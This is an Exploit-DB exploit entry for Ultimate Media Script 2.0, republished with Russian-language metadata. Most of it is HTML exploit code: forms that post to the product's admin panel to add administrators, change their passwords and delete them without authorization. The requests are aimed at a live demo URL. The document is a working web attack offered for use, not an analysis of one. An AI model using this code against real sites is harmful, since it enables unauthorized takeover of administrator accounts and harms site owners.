- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8795
- Проверка EDB
-
- Пройдено
- Автор
- THE G0BL!N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-05-26
HTML:
<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
<FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
<TD class=column1><INPUT class=ums_input name=username></TD>
<TD class=column1><INPUT class=ums_input name=pass></TD>
<TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
<INPUT type=hidden value=add name=button>
</FORM>
</TR>
<TR>
<TD class=cat><b>Admin name:</b></TD>
<TD class=cat><b>Password:</b></TD>
<TD class=cat><b>Delete:</b></TD></TR>
<FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
<TR>
<TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
<TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
<TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
</TR>
<INPUT type=hidden value=modify name=do>
<TR>
</SPAN>
<INPUT type=image border=0 src="img/save_all.gif">
# milw0rm.com [2009-05-26]- Источник
- www.exploit-db.com
